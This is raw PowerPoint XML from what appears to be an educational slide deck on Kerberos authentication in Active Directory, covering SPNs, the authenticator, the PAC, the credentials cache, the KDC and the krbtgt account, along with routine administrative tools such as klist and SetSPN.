                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FC41AC5-D332-4F69-BD54-D7381DF9A5D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="2311051" y="2062159"/>
              <a:ext cx="941342" cy="813477"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Elbow Connector 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{828F160F-7CB6-4E14-A568-91E3A94D9584}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="838549" y="2062159"/>
              <a:ext cx="941342" cy="813477"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65F513D7-9D20-4411-94E8-FE636DF59262}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1789401" y="2984457"/>
              <a:ext cx="2848239" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="205740" lvl="2"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/SQLBASED.samm.contoso.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01CAB825-C3F6-486D-A2F1-F410E0DF231A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4459266" y="2977734"/>
              <a:ext cx="1396985" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="205740" lvl="2"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>contoso\sqlsvc</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A825ABDC-6590-4184-9658-A3AA0F8A97FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1074886" y="2976423"/>
              <a:ext cx="1102802" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="205740" lvl="2"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>MSSQLSvc</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9E7B83-5324-47BD-86CC-E0D18312DEAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3956897" y="2989942"/>
              <a:ext cx="759503" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="205740" lvl="2"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>:1433</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203261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Service Principal Names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="5201424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SPNs are unique identifiers for services running on servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every service that is supposed to use Kerberos Authentication requires an SPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only administrators can set SPNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The System account can set SPN for themselves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying to authenticate against a service that does not have an SPN registered results in the error </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KDC_ERR_S_PRINCIPAL_UNKNOWN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SPNs can be viewed or registered with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SetSPN.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ADSIEdit.msc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dsa.msc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any LDAP Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client application defines the SPN (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>DsMakeSpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The SPN needs to be registered on the service </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6254472" y="3579643"/>
          <a:ext cx="2481506" cy="2592288"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Image" r:id="rId4" imgW="4799880" imgH="5015520" progId="Photoshop.Image.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId4" imgW="4799880" imgH="5015520" progId="Photoshop.Image.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="5" name="Object 4"/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6254472" y="3579643"/>
                        <a:ext cx="2481506" cy="2592288"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3091329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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513293" y="2130628"/>
            <a:ext cx="3887212" cy="3108543"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Kerberos Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Processes and Interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM versus Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Appendix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142885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The Authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3000821"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verifies that the client listed as the sender in the ticket really is the ticket's source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is encrypted with the client / server session key created by the KDC. Only the client and the target server can access the session key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the target server can successfully decrypt the authenticator and if the authenticator's data is accurate, then the target server will trust the source of the ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Authenticator contains client name and timestamp encrypted with the shared session key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19751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320165"/>
            <a:ext cx="7924800" cy="4970591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PAC is the authorization data within the TGT or service ticket that permits to construct the access token after the authentication is approved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PAC contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User SID (and SID Histories if existing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global Group membership</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Local Group membership</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Universal Group membership</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User rights for the user and its groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PAC is signed twice:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With the service account master key – preventing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from altering the authorization data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With the KDC master key – preventing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>service account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from altering the authorization data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PAC structure is documented in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>[MS-PAC]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PAC – Privilege Attribute Certificate</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2048861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Credentials Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3016210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stores tickets and keys in volatile memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is never paged or written to disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also keeps a copy of an interactive user's hashed password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user's TGT expires during a logon session, the Kerberos SSP uses the LSA's copy of the hashed password to obtain a new TGT without interrupting the user's logon session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To see what is in the credential cache: rundll32.exe keymgr.dll, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>KRShowKeyMgr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Klist.exe lists all tickets in the ticket cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28300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Key Distribution Center</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3431709"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication service (AS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issues the ticket granting ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket-granting service (TGS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issues tickets for admission to other services in the TGS's domain or to the ticket-granting service of a trusted domain. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs on every domain controller, shares the same key and uses the same account (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). This applies only to writable domain controllers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses Active Directory as the account database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The AD database also stores SPNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SPNs are unique identifiers for services running on servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102753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err="1"/>
              <a:t>Krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2846933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot be enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stores two password for the KDC service in a domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You cannot set the password directly, it is always auto-generated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recommended to change the password on a regular basis, to mitigate any risks should this KRBTGT account become compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Reset the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> account password/keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the TGT cannot be decrypted with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krgtgt’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> password (N or N-1) you get KRB5KRB_AP_ERR_BAD_INTEGRITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
